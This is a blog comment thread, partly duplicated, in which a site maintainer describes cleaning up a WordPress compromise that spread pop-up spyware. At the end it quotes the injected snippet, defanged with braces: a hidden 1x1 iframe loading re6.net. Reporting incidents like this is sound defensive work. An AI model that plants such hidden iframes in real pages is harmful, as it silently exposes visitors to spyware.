Yes! It started this morning while lurking at T&S. It’s only one ad so far.
Kaimi, I can’t even type without Internet Explorer security windows popping up asking me if I want to trust some pretty bogus stuff.
I’ve located the problem.
It’s gone. Someone modified six files this afternoon (at 1:51 to be exact, just about four hours ago). All six files had a hidden frame installed on them, directing to the very dubious site “re6” dot net.
The affected files were index.php, index.default.php, wp-comments-popup.php, misc.php, guests.php, and categories.php.
The most damaging two were index and wp-comments-popup.
I’m very curious as to how that bit of code got onto the site. Something stinks in Denmark. Perhaps someone with admin access is infected with something. More ominously, perhaps there’s a secuity hole in WP. The program’s choice of files is decidedly odd. Several of them are pages that only exist at T & S (like guests.php) so it may not be a program designed to sneak into wp. I really don’t know how we got hit, but in any case, it should be gone now.
By the way, the spyware was directing to iwantsearch, a known spyware scum site.
The code snippet that was inserted (right before the /body tag) was this: (replacing the greater-than and less-than signs with {} because I don’t want to put actual code here):
yes! It’s killing me!
Yes! It started this morning while lurking at T&S. It’s only one ad so far.
Kaimi, I can’t even type without Internet Explorer security windows popping up asking me if I want to trust some pretty bogus stuff.
I’ve located the problem.
It’s gone. Someone modified six files this afternoon (at 1:51 to be exact, just about four hours ago). All six files had a hidden frame installed on them, directing to the very dubious site “re6” dot net.
The affected files were index.php, index.default.php, wp-comments-popup.php, misc.php, guests.php, and categories.php.
The most damaging two were index and wp-comments-popup.
I’m very curious as to how that bit of code got onto the site. Something stinks in Denmark. Perhaps someone with admin access is infected with something. More ominously, perhaps there’s a secuity hole in WP. The program’s choice of files is decidedly odd. Several of them are pages that only exist at T & S (like guests.php) so it may not be a program designed to sneak into wp. I really don’t know how we got hit, but in any case, it should be gone now.
By the way, the spyware was directing to iwantsearch, a known spyware scum site.
The code snippet that was inserted (right before the /body tag) was this: (replacing the greater-than and less-than signs with {} because I don’t want to put actual code here):
{div style=”visibility: hidden; position: absolute; left: 1; top: 1″} //
{iframe src=”http://re6.net/?s=1″ frameborder=0 vspace=0 hspace=0 width=1 height=1 marginwidth=0 marginheight=0 scrolling=no} //
{/iframe}{/div} //